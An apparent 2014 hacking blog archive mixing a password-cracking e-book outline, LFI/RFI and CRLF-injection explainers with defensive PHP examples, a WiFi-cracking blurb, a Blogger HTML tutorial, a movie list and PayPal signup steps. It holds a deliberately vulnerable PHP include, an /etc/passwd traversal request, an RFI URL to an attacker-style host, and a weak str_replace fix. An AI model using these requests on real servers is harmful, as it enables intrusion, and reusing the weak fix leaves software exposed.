Sunday, April 13, 2014

Cracking Passwords Guide


This document is for people who want to learn the how and why of password cracking. There is a lot of information being presented and you should READ IT ALL BEFORE you attempt anything documented here. I do my best to provide step-by-step instructions along with the reasons for doing it this way. Other times I will point to a particular website where you can find the information. In those cases someone else has done what I am attempting and did a good or great job, and I did not want to steal their hard work. These instructions have several excerpts from a combination of posts from pureh@te, granger53, showsgeek, PrairieFire, RaginRob, stasik, and Solar Designer. I would also like to thank each of them and others for the help they have provided me on the BackTrack forum.
Type: E-Book

Contents
1 LM vs. NTLM
2 Syskey
3 Cracking Windows Passwords
3.1 Extracting the hashes from the Windows SAM
3.1.1 Using BackTrack Tools
3.1.1.1 Using bkhive and samdump v1.1.1 (BT2 and BT3)
3.1.1.2 Using samdump2 v2.0.1 (BT4)
3.1.1.3 Cached Credentials
3.1.2 Using Windows Tools
3.1.2.1 Using fgdump
3.1.2.2 Using gsecdump
3.1.2.3 Using pwdump7
3.1.2.4 Cached Credentials
3.2 Extracting the hashes from the Windows SAM remotely
3.2.1 Using BackTrack Tools
3.2.1.1 ettercap
3.2.2 Using Windows Tools
3.2.2.1 Using fgdump
3.3 Cracking Windows Passwords
3.3.1 Using BackTrack Tools
3.3.1.1 John the Ripper BT3 and BT4
3.3.1.1.1 Cracking the LM hash
3.3.1.1.2 Cracking the NTLM hash
3.3.1.1.3 Cracking the NTLM using the cracked LM hash
3.3.1.1.4 Cracking cached credentials
3.3.1.2 John the Ripper - current
3.3.1.2.1 Get and Compile
3.3.1.2.2 Cracking the LM hash
3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
3.3.1.2.4 Cracking the NTLM hash
3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
3.3.1.2.6 Cracking cached credentials
3.3.1.3 Using MDCrack
3.3.1.3.1 Cracking the LM hash
3.3.1.3.2 Cracking the NTLM hash
3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
3.3.1.4 Using Ophcrack
3.3.1.4.1 Cracking the LM hash
3.3.1.4.2 Cracking the NTLM hash
3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
3.3.2 Using Windows Tools
3.3.2.1 John the Ripper
3.3.2.1.1 Cracking the LM hash
3.3.2.1.2 Cracking the NTLM hash
3.3.2.1.3 Cracking the NTLM hash using the cracked LM hash
3.3.2.1.4 Cracking cached credentials
3.3.2.2 Using MDCrack
3.3.2.2.1 Cracking the LM hash
3.3.2.2.2 Cracking the NTLM hash
3.3.2.2.3 Cracking the NTLM hash using the cracked LM hash
3.3.2.3 Using Ophcrack
3.3.2.3.1 Cracking the LM hash
3.3.2.3.2 Cracking the NTLM hash
3.3.2.3.3 Cracking the NTLM hash using the cracked LM hash
3.3.2.4 Using Cain and Abel
3.3.3 Using a Live CD
3.3.3.1 Ophcrack
4. Changing Windows Passwords
4.1 Changing Local User Passwords
4.1.1 Using BackTrack Tools
4.1.1.1 chntpw
4.1.2 Using a Live CD
4.1.2.1 chntpw
4.1.2.2 System Rescue CD
4.2 Changing Active Directory Passwords
5 plain-text.info
6 Cracking Novell NetWare Passwords
7 Cracking Linux/Unix Passwords
8 Cracking networking equipment passwords
8.1 Using BackTrack tools
8.1.1 Using Hydra
8.1.2 Using Xhydra
8.1.3 Using Medusa
8.1.4 Using John the Ripper to crack a Cisco hash
8.2 Using Windows tools
8.2.1 Using Brutus
9 Cracking Applications
9.1 Cracking Oracle 11g (sha1)
9.2 Cracking Oracle passwords over the wire
9.3 Cracking Office passwords
9.4 Cracking tar passwords
9.5 Cracking zip passwords
9.6 Cracking pdf passwords
10 Wordlists aka Dictionary attack
10.1 Using John the Ripper to generate a wordlist
10.2 Configuring John the Ripper to use a wordlist
10.3 Using crunch to generate a wordlist
10.4 Generate a wordlist from a textfile or website
10.5 Using premade wordlists
10.6 Other wordlist generators
10.7 Manipulating your wordlist
11 Rainbow Tables
11.1 What are they?
11.2 Generating your own
11.2.1 rcrack - obsolete but works
11.2.2 rcracki
11.2.3 rcracki - boinc client
11.2.4 Generating a rainbow table
11.3 WEP cracking
11.4 WPA-PSK
11.4.1 airolib
11.4.2 pyrit
12 Distributed Password cracking
12.1 john
12.2 medussa (not a typo this is not medusa)
13 using a GPU
13.1 cuda - nvidia
13.2 stream - ati
14 example hash.txt


Create HTML Scroll Box on Blogger for Post


We are going to learn how to create different types of HTML scroll box for a Blogger post.
Why do you need it? If you are a blogger and want to show script code to your readers, this is very useful. A scroll box is handy when you have a lot of data or text but limited space to display it. Besides text, the scroll box can contain images and HTML code too. It is easy to create one, and it can be placed within a blog post or page, or even in the sidebar, the footer or below a header for announcements and the like. It helps to save valuable space in your blog.



Different Types of HTML Scroll Box Code:
1. Simplest Scroll Box Code:

<!-- Codes by geekyshows.com -->
<center><div style="text-align:left;width:150px;height:150px;overflow:scroll;padding:5px;">
WRITE YOUR TEXT HERE. 
</div>
</center>


How to Do:
A. First copy the above code, then create a new post. Click on HTML and paste the code.
B. Click on Compose and edit the text as required.

Editing the Code:
text-align:left - Your text will start from the left side. You can change it to center or right.
width:150px - To change the width of the scroll box, replace the width value as required. For example, width:400px
height:150px - To change the height of the scroll box, replace the height value as required. For example, height:300px
overflow:scroll - Tells the browser to add scrollbars to the box.
Changing Text - You can change the text style, color, etc. using the Blogger toolbar.

2. Auto Scrollbars - In the above example we used overflow:scroll to add scrollbars to the box. Another option is to use overflow:auto.
With overflow:auto, the box only grows scrollbars if the contents are too big to fit inside. In other words, scrollbars appear only when they are needed.
Code A: A short line of text, so no scrollbar appears in the output.

<!-- Codes by geekyshows.com -->
<center>
<div style="text-align:left;width:250px;height:150px;overflow:auto;padding:5px;">
One small line of text by geekyshow. 
</div>
</center>
How to Do: The method is the same as explained for the 1st code.
Output: There is no scrollbar, because we have only a short line of text.

Code B: More lines of text, so a scrollbar is created automatically. See the output.

<!-- Codes by geekyshows.com -->
<center>
<div style="text-align:left;width:150px;height:50px;overflow:auto;padding:5px;">
This contains more text of line than the previous one. Because there's too much text to fit into the box, the box grows scrollbars. by geekyshow. 
</div>
</center>
How to Do: The method is the same as explained for the 1st code.
Output: There is a scrollbar, because we have more lines of text.

3. Scroll Box With color and border 
Code :

<!-- Codes by geekyshows.com -->
<center>
<div style="text-align:left;width:300px;height:150px;overflow:scroll;padding:5px;background-color:#FCFADD;color:#714D03;border:4px double #DEBB07;">
WRITE YOUR TEXT HERE BY GEEKYSHOWS. 
</div>
</center>

How to Do: The method is the same as explained for the 1st code.
Output: This is our scroll box with color and border.

Editing Code :
background-color:#FCFADD - To change the background color, replace #FCFADD with your own color code.
color:#714D03 - To change the text color, replace #714D03 with your own color code.
border:4px double #DEBB07 - You can resize your border.



Friday, April 11, 2014

File Inclusion


A file inclusion attack is one in which an attacker can get a file executed within a web page. This type of attack is possible when user-supplied data is improperly filtered. Through this vulnerability the attacker can execute scripts and steal data. By leveraging the vulnerability in a PHP application, an attacker can execute commands to carry out different attacks.
File inclusion attacks are of two types:
  1. Local File Inclusion.
  2. Remote File Inclusion.


Local File Inclusion (LFI)

In LFI the attacker takes advantage of improper filtering of a file name supplied in the request. The following PHP is vulnerable to LFI:

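<?php
// Deliberately vulnerable: the request parameter is used as a path without any validation.
if (isset($_GET['file']))
{
    $file = $_GET['file'];
    include("pages/$file");
}
else
{
    include("index.php");
}
?>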

The original request will look like this:
http://www.test.com/index.php?file=contact.php
The attacker will send the following request:
http://www.test.com/index.php?file=../../../../etc/passwd
This discloses the contents of /etc/passwd on the server.
The countermeasure for this attack is to modify the assignment of the PHP $file variable as follows:
$file = str_replace('../', '', $_GET['file']);
The LFI request shown above will not work after replacing the above line.

Remote File Inclusion (RFI)

Remote File Inclusion (RFI) is an attack that targets the computer servers that run Web sites and their applications. RFI exploits are most often attributed to the PHP programming language used by many large firms including Facebook and SugarCRM. However, RFI can manifest itself in other environments and was in fact introduced initially as "SHTML injection". RFI works by exploiting applications that dynamically reference external scripts indicated by user input without proper sanitation. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The executed scripts can be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
Remote File Inclusion (RFI) is caused by insufficient validation of user input provided as parameters to a Web application. Parameters that are vulnerable to RFI enable an attacker to include code from a remotely hosted file in a script executed on the application’s server. Since the attacker’s code is thus executed on the Web server it might be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
The RFI attack vector includes a URL reference to the remotely hosted code. Most attacks include two steps.
  • In the first step, the attack vector references a simple validation script, usually capable of printing some distinguished output to the HTML page.
  • If the validation script is successfully executed by the server under attack, the attacker proceeds with a second vector that references the actual payload script. The servers hosting the script are either compromised servers or file sharing services.
A remote file inclusion attack allows an attacker to have a malicious file or script, hosted anywhere, executed by the server.
The vulnerability exploits poor validation checks in websites and can eventually lead to code execution on the server or on the website. With an RFI attack an attacker can gain access to the server.
Suppose the vulnerable page is:
http://www.test.com/index.php?page=office
This page uses the PHP include function to fetch a document in text format from the server.
The attacker can have a script executed instead of the genuine page as follows:
http://www.test.com/index.php?page=http://www.hackersite.com/maliciousscript.txt

Preventing File Inclusions (RFI - LFI) Vulnerabilities

The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web Application Firewall (WAF). Detection and blocking of such attacks can be enhanced by creating a blacklist of attack sources and a blacklist of URLs of remotely included malicious scripts:
  • Advanced knowledge of RFI attack sources enables the WAF to block an attack before it even begins.
  • A blacklist of the referenced URL enables the WAF to block exploits targeting zero-day vulnerabilities of applications.
  • The blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.
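
An application-level fix for both the LFI and the RFI case, as an added example that is not code from the original post: the request value is checked against a fixed allowlist and the resolved path is confirmed to lie inside the pages directory, because stripping one literal pattern (as the str_replace countermeasure in the LFI section does) does not constrain where the final path points. The function name resolve_page(), the ALLOWED_PAGES entries and the temporary demo directory are assumptions; the two hostile sample values are the ones from the URLs in this post.

```php
<?php
declare(strict_types=1);

// Added example (not from the original post). Assumed names: resolve_page(),
// ALLOWED_PAGES and the temporary demo directory.
// Independently of this code, keep allow_url_include=Off in php.ini so that
// include() never fetches a URL.

const ALLOWED_PAGES = ['contact.php', 'office.php'];

/**
 * Return the absolute path to include, or null if the request must be refused.
 */
function resolve_page($requested, string $pagesDir): ?string
{
    // Query values can arrive as arrays (?file[]=x); accept plain strings only.
    if (!is_string($requested)) {
        return null;
    }
    // 1. Allowlist: the value must be exactly one of the known page files.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defence in depth: canonicalise the path (resolves ".." and symlinks)
    //    and confirm the result is still inside the pages directory.
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// --- Demo on constructed data ---------------------------------------------
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inclusion_demo_pages';
if (!is_dir($pagesDir)) {
    mkdir($pagesDir, 0700, true);
}
file_put_contents($pagesDir . DIRECTORY_SEPARATOR . 'contact.php', 'contact page');

$samples = [
    'contact.php',                                    // legitimate request
    '../../../../etc/passwd',                         // LFI value from the post
    'http://www.hackersite.com/maliciousscript.txt',  // RFI value from the post
    'office.php',                                     // allowlisted but missing on disk
    ['contact.php'],                                  // array instead of a string
];

foreach ($samples as $value) {
    $path = resolve_page($value, $pagesDir);
    printf(
        "%-52s => %s\n",
        json_encode($value, JSON_UNESCAPED_SLASHES),
        $path === null ? 'refused (respond 404)' : 'include ' . $path
    );
}
```

Only the first sample resolves to a path; the calling script would pass that return value to include() and answer every null with a 404.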


Tuesday, April 8, 2014

N00bs Wifi Cracking

Type: E-Book

In the beginning of WiFi communication, WEP (Wired Equivalent Protection) was the only encryption a wireless network user had to choose from. At the time that was great, because no tools existed to break it. However, less than a year after WiFi became mainstream, tools began to emerge that made cracking WEP encryption possible. The first tools were command-line tools, and cracking could take a very long time. Nowadays WEP and WPS (Wireless Protected Setup) have become 100% crackable, with WEP taking only minutes most times and WPS taking anywhere from a few seconds to a day or two. The only standing security for “consumer” WiFi now falls to WPA/WPA2 (Wireless Protected Access). However, even that can be cracked if you have what it takes.



Friday, April 4, 2014

HTTP response splitting


HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.

The attack consists of making the server print a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by content supplied by the attacker in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard (RFC 2616), headers are separated by one CRLF and the response's headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses—hence the name.


CRLF Injection

CRLF refers to the special character elements "Carriage Return" and "Line Feed". These elements are embedded in HTTP headers and other software code to signify an End of Line (EOL) marker. Many internet protocols, including MIME (e-mail), NNTP (newsgroups) and more importantly HTTP use CRLF sequences to split text streams into discrete elements. Web application developers split HTTP and other headers based on where CRLF is located. Exploits occur when an attacker is able to inject a CRLF sequence into an HTTP stream. By introducing this unexpected CRLF injection, the attacker is able to maliciously exploit CRLF vulnerabilities in order to manipulate the web application's functions.
A more formal name for CRLF Injection is Improper Neutralization of CRLF Sequences. Because CRLF injection is frequently used to split HTTP responses, it can also be designated as HTTP Response Splitting or Improper Neutralization of CRLF Sequences in HTTP Headers.

Key Concepts of CRLF Injection

CRLF Injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. When CRLF Injection is used to split a HTTP response header it is referred to as HTTP Response Splitting. CRLF Injection vulnerabilities result from data input that is not neutralized, incorrectly neutralized, or otherwise unsanitized.
Attackers provide specially crafted text streams with CRLF injections in order to trick the web application to perform unexpected and potentially harmful actions ranging from medium to high severity. Attackers exploit the CRLF Injection vulnerability by injecting CRLF sequences in order to split a text stream to embed text sequences that the web application is not expecting. These unexpected CRLF injections can result in a security breach and cause material harm.
CRLF Injection exploits security vulnerabilities at the application layer. By exploiting the CRLF Injection flaw in an HTTP response, for example, attackers can modify application data, compromising integrity and enabling the exploitation of the following vulnerabilities:
  • XSS or Cross Site Scripting vulnerabilities
  • Proxy and web server cache poisoning
  • Web site defacement
  • Hijacking the client's session
  • Client web browser poisoning
Explaining CRLF Injection Through Examples

Let's examine how CRLF Injections cause damage by looking at one of the most basic examples of a CRLF attack: adding fake entries into log files. Suppose a vulnerable application accepts unsanitized or improperly neutralized data and writes it to a system log file. An attacker supplies the following input:

Because this error is fake, a sysadmin may waste a lot of time troubleshooting a non-existent error. An attacker could use this type of Trojan to distract the admin while attacking the system somewhere else.
Another way to illustrate how CRLF Injections can cause severe harm is through an application that accepts a file name as user input and then executes a relatively harmless command on that file such as "ls –a ." If the application is vulnerable to CRLF injection because of improperly neutralized or unsanitized data input, an attacker could provide the following input:

This CRLF Injection attack could wipe out the entire file system if the application were running with root privileges on a linux/unix system!

Preventing HTTP Response Splitting Vulnerabilities

Fortunately, HTTP response splitting vulnerabilities are easy to prevent:
  • Always follow the rule of never trusting user input.
  • Sanitize and neutralize all user-supplied data, or properly encode output in HTTP headers that would otherwise be visible to users, in order to prevent the injection of CRLF sequences and their consequences.
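
The neutralization described in this post, as an added example that is not code from the original post: header lines containing CR, LF or NUL are refused, a user value placed in a redirect URL is percent-encoded, and log fields are escaped so one event stays on one line. The function names build_header(), redirect_header() and log_field(), the header names and the sample values are assumptions constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example (not from the original post). Function names and the sample
// values are assumptions; the values are constructed for the demonstration.

/**
 * Build one header line. CR, LF and NUL have no legitimate place inside a
 * header name or value, so the request is refused rather than "cleaned".
 */
function build_header(string $name, string $value): string
{
    if (preg_match('/[\r\n\0]/', $name . $value) === 1) {
        throw new InvalidArgumentException('control character in HTTP header');
    }
    return $name . ': ' . $value;
}

/**
 * Redirect target built from user input: percent-encode the value so a CRLF
 * becomes the inert text %0D%0A inside the URL.
 */
function redirect_header(string $lang): string
{
    return build_header('Location', '/home?lang=' . rawurlencode($lang));
}

/**
 * Log neutralisation: escape control characters and the backslash so one
 * event always stays on one line and the escaping is unambiguous.
 */
function log_field(string $value): string
{
    return addcslashes($value, "\0..\37\177\\");
}

// --- Demo on constructed input --------------------------------------------
$benign  = 'en';
$crafted = "en\r\nX-Injected: constructed-sample";

echo redirect_header($benign), "\n";   // Location: /home?lang=en
echo redirect_header($crafted), "\n";  // CRLF appears only as %0D%0A

try {
    // A raw value placed directly into a header is refused outright.
    echo build_header('X-Lang', $crafted), "\n";
} catch (InvalidArgumentException $e) {
    echo 'refused: ', $e->getMessage(), "\n";
}

// The log line stays a single line; the CR and LF are written as \r\n text.
echo 'lang=', log_field($crafted), "\n";
```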


Wednesday, April 2, 2014

Movies Based on Hacking

In this post we share a list of top hacker movies. Every hacker should watch these movies. You will really enjoy them.


Die Hard 4: Live Free or Die Hard (2007)

Hackers (1995)

Antitrust (2001)

Pirates of Silicon Valley (1999)


The Italian Job (2003)

The Net 2.0 (2006)

Untraceable (2008)

Foolproof (2003)

Firewall (2006)

The Score (2001)

Swordfish (2001)

Sneakers (1992)

The Social Network (2010)

Takedown (2000)

2001: A Space Odyssey (1968)

The Computer Wore Tennis Shoes (1969)

War Games (1983)

Prime Risk (1985)

The Net (1995)

Ghost in the Shell (1995)

23 (1998)

Webmaster (1998) / Skyggen (1998)

Office Space (1999)

The Thirteenth Floor (1999)

eXistenZ (1999)

Code Hunter/Storm Watch (2002)

One Point O (or) Paranoia 1.0 (2004)

Deja Vu (2006)

War Games : The Dead Code (2008)

Underground: The Julian Assange Story (2012)

The Girl with the Dragon Tattoo (2009)




Tuesday, April 1, 2014

How to Open Paypal account in India

What is Paypal?
PayPal is the faster, safer way to pay and get paid online, via a mobile device and in store. The service gives people simpler ways to send money without sharing financial information, and with the flexibility to pay using their account balances, bank accounts, credit cards or promotional financing. With 143 million active accounts in 193 markets and 26 currencies around the world, PayPal enables global commerce, processing more than 9 million payments every day. Because PayPal helps people transact anytime, anywhere and in any way, the company is a driving force behind the growth of mobile commerce and processed $27 billion in mobile payments in 2013. PayPal is an eBay (Nasdaq:EBAY) company and contributed 41 percent of eBay Inc.'s revenues in 2013. PayPal is headquartered in San Jose, Calif. and its international headquarters is located in Singapore.

As of March 2011, PayPal made changes to the User Agreement for Indian users to comply with Reserve Bank of India regulations. Notable changes to the agreement were:
  • Any balance or future payments must not be used to buy goods or services but transferred to a bank account. The PayPal balance is automatically withdrawn to the bank account.
  • PayPal balance cannot be used to make purchases. Credit/Debit cards linked with the PayPal account must be used to pay through PayPal.
The per transaction limit had been set to USD 3000, since October 14, 2011. However, on July 29, 2013 PayPal has increased the per transaction limit to USD 10,000. This brings the per transaction limit for India in line with the restrictions imposed by PayPal on most other countries.
PayPal has disabled sending and receiving personal payments in India, thus forcing all recipients to pay a transaction fee.
PayPal wants to make India an incubation center for the company's employee engagement policies. In 2012, PayPal hired 120 people for its offices in Chennai and Bangalore. PayPal plans to recruit 1000 candidates for its Bangalore Development center.

What You need for Creating a Paypal Account:
  • PAN Card 
  • An Active Email ID
  • Bank Details with IFSC Code 
Where can I get my bank IFSC code?
Is there any charge for creating a PayPal account?
No, it's free of cost.

How to setup a Paypal Account :
1. Go to the official PayPal site www.paypal.com and click on Sign Up.

2. Select your country and click on Get Started under An account for Individuals.

3. Now fill in the form completely. The details should match your PAN card and bank details. This will help you to verify your PayPal account in the future. After filling in the form, click on Agree and Create Account.

4. In this screen fill the Code as shown and click on Continue.

5. In this screen you do not need to fill up your credit/debit card details. Simply click on Go to My account

6. In this step Click on Add Bank

7. Fill up this form according to your bank details and click on Continue

8. Now click on the Purpose Code link. On the screen that appears, select Advertising and market research and click on Save.

9. It's done for now, but after some days you will receive two small amounts in your bank account. It takes around 7 days maximum. Whenever those amounts are credited to your bank account, come back to your PayPal account and enter them in the specific field. If everything is OK, your account will be verified.

